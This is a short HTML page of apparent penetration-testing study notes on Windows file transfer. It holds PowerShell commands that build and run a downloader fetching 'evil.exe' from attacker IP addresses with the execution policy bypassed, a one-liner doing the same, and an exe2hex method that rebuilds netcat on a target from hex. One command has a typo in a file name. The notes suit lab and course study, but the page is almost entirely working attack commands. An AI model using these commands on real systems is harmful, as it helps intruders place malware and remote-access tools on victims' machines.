<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows Powershell File Transfer</title>
</head><body>C:\Users\Offsec&gt; echo $webclient = New-Object System.Net.WebClient &gt;&gt;wget.ps1<br/>
C:\Users\Offsec&gt; echo $url = "http://10.11.0.4/evil.exe" &gt;&gt;wget.ps1<br/>
C:\Users\Offsec&gt; echo $file = "new-exploit.exe" &gt;&gt;wget.ps1<br/>
C:\Users\Offsec&gt; echo $webclient.DownloadFile($url,$file) &gt;&gt;wget.ps<br/>
<br/>
&nbsp;powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoPro file -File wget.ps1<br/>
<br/>
#oneliner:<br/>
<br/>
&nbsp;powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.181/evil.exe', 'new-exploit.exe') <br/>
<br/>
<br/>
#method 2: exe2hex<br/>
<br/>
exe2hex -x nc.exe -p nc.cmd<br/>
<br/>
<br/>
powershell -Command "$h=Get-Content -readcount 0 -path './nc.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'nc.exe' -value $b;Remove-Item -force nc.hex;" <br/>
<br/>
<br/>
#upload file from windows to kali<br/>
<br/>
page 487 PWK book</body></html>